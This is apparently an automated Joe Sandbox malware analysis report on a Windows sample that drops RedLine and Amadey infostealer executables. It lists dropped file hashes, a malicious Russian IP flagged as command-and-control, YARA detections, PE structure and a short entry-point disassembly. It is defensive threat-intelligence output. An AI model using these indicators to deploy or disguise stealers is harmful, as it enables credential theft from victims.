                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/06/addressingexbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoorbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/NoncebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsebRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/RenewbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://tempuri.org/Entity/Id17ResponsebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
193.233.20.13 | unknown | Russian Federation | | 8749 | REDCOM-ASRedcomKhabarovskRussiaRU | true
                                                                                                                                                              Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                              Analysis ID:808971
                                                                                                                                                              Start date and time:2023-02-15 21:47:12 +01:00
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 10m 28s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                              Number of analysed new started processes analysed:22
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Sample file name:file.exe
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@15/10@0/1
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 83.3%
                                                                                                                                                              HDC Information:
                                                                                                                                                              • Successful, ratio: 100% (good quality ratio 95.8%)
                                                                                                                                                              • Quality average: 85.2%
                                                                                                                                                              • Quality standard deviation: 22.7%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              • Number of executed functions: 214
                                                                                                                                                              • Number of non-executed functions: 129
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                              • Override analysis time to 240s for rundll32
                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                                                                                                                                              • Execution Graph export aborted for target bRz07Kk.exe, PID 4812 because it is empty
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
21:48:56 | API Interceptor | 11x Sleep call for process: bRz07Kk.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
193.233.20.13 | file.exe | | malicious | |
                                                                                                                                                                                                      No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
REDCOM-ASRedcomKhabarovskRussiaRU | file.exe | Get hash | malicious | Browse | 193.233.20.13
                                                                                                                                                                                                      No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\Users\user\AppData\Local\Temp\IXP000.TMP\fcC6215.exe | file.exe | Get hash | malicious | Browse
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe
                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):226
                                                                                                                                                                                                                                              Entropy (8bit):5.354940450065058
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                                                                                                                                                                                              MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                                                                                              SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                                                                                              SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                                                                                              SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2843
                                                                                                                                                                                                                                              Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKAHKx1V:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxo
                                                                                                                                                                                                                                              MD5:AA480F97CE07B9F7A0B038BD06505712
                                                                                                                                                                                                                                              SHA1:0D7E42D0733A18A4C48B83EBBC68575925B0CD69
                                                                                                                                                                                                                                              SHA-256:433F8C545F788D4F901AAD7B70F63700BD6861A1ABE32FAE7C8FD08AE29004BD
                                                                                                                                                                                                                                              SHA-512:9A3AAEF350767D68BD455F50272BB942A860D3712C831C99896B9814C1733198321B3422D7E411974C56D71DA064716E354BAC0963DFB1D9A786612897A2A4CF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):271968
                                                                                                                                                                                                                                              Entropy (8bit):6.785024216945511
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:NUiW6OOqvkZFEpgWuhy7WSJgERQxw4kQebn6TtysRNkezrIjOBxKUGAJI0:NdqvcFSgWdbGtSKtFRNke3IjO7KUNJX
                                                                                                                                                                                                                                              MD5:B9EEDD1C8B16C4481C3CADBE6ED97280
                                                                                                                                                                                                                                              SHA1:6D44E5CED475BDA87D1282B30EBC84BD25595E1F
                                                                                                                                                                                                                                              SHA-256:CEB59E6DDD127FCC56E7DCA136002B8552290A954C92DD565706C4DC472BAD17
                                                                                                                                                                                                                                              SHA-512:335B334750F8DE4E366C7EB3DDC854A46B0D8CBD4D5479671131C9CE9A93FE679AE728B970B6CE3489A6863472BD2172870C6C8E4F1271234B23717A6DC957F1
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):742912
                                                                                                                                                                                                                                              Entropy (8bit):7.881821282534899
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:FMrUy90AVSctxTOsPliGrzNf0yCE2AZ6oSvArrngnEAHOAJRjU:ZypnKstia10y1EIri4
                                                                                                                                                                                                                                              MD5:4C0E7D70D851B36C6338565474276043
                                                                                                                                                                                                                                              SHA1:5F6D44F1580B7A035526148A072960D6E35AF5B4
                                                                                                                                                                                                                                              SHA-256:70E7633E9F57479D16939718B97721CD6EAA111B405CB595277F38DEBD1A2454
                                                                                                                                                                                                                                              SHA-512:3A674E759D3DBFCCF88123AECEADC276D9CAFE5D0BC04C10C3D2411ECFDAF2538CFF352EEF336AC3BFE5E3169C6ED8288C647F6EDA8A1F2835354409867AFEDA
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):241664
                                                                                                                                                                                                                                              Entropy (8bit):6.368017511636962
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:bMwVoejm5JJw20a1bfjVEmAuVy1GNgsk8gF:bp7Za5VsuVy0NS
                                                                                                                                                                                                                                              MD5:52FCA4D08FACCBD7D3F9A487158ED24A
                                                                                                                                                                                                                                              SHA1:999297FAE9ADAACA1F2163E45AA4100EBE2A27F6
                                                                                                                                                                                                                                              SHA-256:6EF9B879049E0E8490811B7A90CCD47DE82B17BA7E9850485E035780E474FF14
                                                                                                                                                                                                                                              SHA-512:7669FCA02637A8D02B53837B0BC62025625D7615C275414412ECD0D4F0D6377C588A401E11D637ABD1B10269BA813555A6600CEBE8657EC78F104F350D4A0368
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exe, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):551936
                                                                                                                                                                                                                                              Entropy (8bit):7.816995957388884
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:pMriy90Qdl9+sLD+0sNaMQf0yCMu3ZFgSvArvXmnEAHWF:rybdbnvvme0yqzIr9
                                                                                                                                                                                                                                              MD5:57EB0A896C2D871FDCCB5F4A5765F84D
                                                                                                                                                                                                                                              SHA1:506CF538FB6946CD6DB964169BABD217AD042B6A
                                                                                                                                                                                                                                              SHA-256:102F1C44315A22855A37144BCD1018AD6ED58A35AF60E59AF16A5D779C7B5B3A
                                                                                                                                                                                                                                              SHA-512:397B16A5AB5E556CA893B9D87E129DADF98A47EC41C09CA1CFFF33417AE201F2C864DE08EA771B9A0B751C17E1040F25F4B7D292885ACC1DCD8B10CBABB9E4B7
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):323072
                                                                                                                                                                                                                                              Entropy (8bit):7.433549473103745
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:ABMvcjvc/wBejySyrWNJ3TmN/grvArsGW2CcTg8Ua1:ABVMwBuyi7WgrvArsGWdC1H
                                                                                                                                                                                                                                              MD5:E55D7636A5E2C2F2A7ED7486C32D16D6
                                                                                                                                                                                                                                              SHA1:CD57BB8A2C7731BBA1A3EDDF5A4E8A587FE9B566
                                                                                                                                                                                                                                              SHA-256:10BC0CEA1822691D9CAB6938719DAB26187563160EDFB8F039FA08FD345E357F
                                                                                                                                                                                                                                              SHA-512:B0423F03D75F00F573189FB08B59E7B9245728FC0C294697BB755D0FC63DFAB2B9334C6B1BB61E109409B5CCE3B98C041217741CFE2C7B89E882E596842880BD
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):206848
                                                                                                                                                                                                                                              Entropy (8bit):7.244357007934624
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:KJy+bnr+O175GWp1icKAArDZz4N9GhbkrNEk6+JfW0MbuDuzIb6bCiQSTTTf1lYw:KJy+bnr+Yp0yN90QEAfFME+s9i5XA
                                                                                                                                                                                                                                              MD5:169FAA6C3CA7D213D20BDC00810116B8
                                                                                                                                                                                                                                              SHA1:3A98D13983E544D66FC92F534B259260F57675C1
                                                                                                                                                                                                                                              SHA-256:E9089980DDCE441BA5A5F5CAE7D84132B2A0CCE6A41E666F8B185849B80BB951
                                                                                                                                                                                                                                              SHA-512:B1FF9E4A435C669EBB3DF27688158E14644CAD1823C92E472B1C7C35BD3AB5094B276C8230AA6335F6334BD4E1A0D131324BE143BA64BEF43A4BD7E29E62645A
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):11264
                                                                                                                                                                                                                                              Entropy (8bit):4.97029807367379
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                                                                                                                                                                                              MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                              SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                                                                                                                                                                                                              SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                                                                                                                                                                                                              SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):179200
                                                                                                                                                                                                                                              Entropy (8bit):4.951855814556234
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:IxqZWPTa9ApGvgiOTcdkeZ59xhmHxNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOF:2qZvgiO6Jxh
                                                                                                                                                                                                                                              MD5:DD0C9E110C68CE1FA5308979EF718F7B
                                                                                                                                                                                                                                              SHA1:473DEB8069F0841D47B74B7F414DACC6F96ECA78
                                                                                                                                                                                                                                              SHA-256:DC28C9D9AB3F30222ED59F3991C5981BEC40604E725ECE488D8599EEF917A7B3
                                                                                                                                                                                                                                              SHA-512:29BD76DA816B13B31C938A3F8699D2F5942A24C9EF61FDDCAC490E0A30F82C1A4A76CA9A6866A8D2C8E57566F66B3AEA31E7F70646D3EBEF63C63A06F8FE2236
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, Author: ditekSHen
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):7.920893858456212
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                              File name:file.exe
                                                                                                                                                                                                                                              File size:969728
                                                                                                                                                                                                                                              MD5:33f01dc275ffa0c5989f8630eb4279b5
                                                                                                                                                                                                                                              SHA1:65e07e1c5d25a9d9817664a11d603dd7a5e21a6f
                                                                                                                                                                                                                                              SHA256:e8d4d6a87f54b65a7a04e7ccd0da266638f71e4c2b4d309eff8a5d79b48c058f
                                                                                                                                                                                                                                              SHA512:7949aa73b3225c7efe32675c93d1238e11614dccb585f96fe4f07d87f78974b96a62c2707549ae84c35281e427369cd59b1a5fec22137815acd3660e4835d2ed
                                                                                                                                                                                                                                              SSDEEP:12288:wMrky90eZ/G3CbsVsf39ht1TOsWUvpdyqwTKpf0CCzXQZ6iSXAryrCnWAH/AnoD/:EylhGua839h6sYRmR0CruQrGgl6M3
                                                                                                                                                                                                                                              TLSH:D2252347D6D84422E8B9737009F60BC30736BD705F34879B63C7BC9A1872AA5A67532B
                                                                                                                                                                                                                                              Icon Hash:f8e0e4e8ecccc870
                                                                                                                                                                                                                                              Entrypoint:0x406a60
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:10
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:10
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:10
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              call 00007FFAB869A1F5h
                                                                                                                                                                                                                                              jmp 00007FFAB8699B05h
                                                                                                                                                                                                                                              push 00000058h
                                                                                                                                                                                                                                              push 004072B8h
                                                                                                                                                                                                                                              call 00007FFAB869A297h
                                                                                                                                                                                                                                              xor ebx, ebx
                                                                                                                                                                                                                                              mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                                                              lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              call dword ptr [0040A184h]
                                                                                                                                                                                                                                              mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                                                              mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                                                              mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                                                              mov edi, ebx
                                                                                                                                                                                                                                              mov edx, 004088ACh
                                                                                                                                                                                                                                              mov ecx, esi
                                                                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                                                                              lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                                              je 00007FFAB8699B1Ah
                                                                                                                                                                                                                                              cmp eax, esi
                                                                                                                                                                                                                                              jne 00007FFAB8699B09h
                                                                                                                                                                                                                                              xor esi, esi
                                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                                              mov edi, esi
                                                                                                                                                                                                                                              jmp 00007FFAB8699B12h
                                                                                                                                                                                                                                              push 000003E8h
                                                                                                                                                                                                                                              call dword ptr [0040A188h]
                                                                                                                                                                                                                                              jmp 00007FFAB8699AD9h
                                                                                                                                                                                                                                              xor esi, esi
                                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                                              cmp dword ptr [004088B0h], esi
jne 00007FFAB8699B0Ch
push 0000001Fh
call 00007FFAB869A02Bh
pop ecx
jmp 00007FFAB8699B3Ch
cmp dword ptr [004088B0h], ebx
jne 00007FFAB8699B2Eh
mov dword ptr [004088B0h], esi
push 004010C4h
push 004010B8h
call 00007FFAB8699C56h
pop ecx
pop ecx
test eax, eax
je 00007FFAB8699B19h
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, 000000FFh
jmp 00007FFAB8699C39h
mov dword ptr [004081E4h], esi
cmp dword ptr [004088B0h], esi
jne 00007FFAB8699B1Dh
push 004010B4h
push 004010ACh
call 00007FFAB869A1E5h
pop ecx
pop ecx
mov dword ptr [000088B0h], 00000000h

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0xe4504 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf1000 | 0x888 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0xc000 | 0xe5000 | 0xe4600 | False | 0.9592911877394636 | data | 7.94233574337495 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xf1000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| AVI | 0xcb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States |
| RT_ICON | 0xf94c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States |
| RT_ICON | 0xffb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States |
| RT_ICON | 0x1029c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States |
| RT_ICON | 0x10484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States |
| RT_ICON | 0x105ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States |
| RT_ICON | 0x11454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States |
| RT_ICON | 0x11cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States |
| RT_ICON | 0x123c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States |
| RT_ICON | 0x1292c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
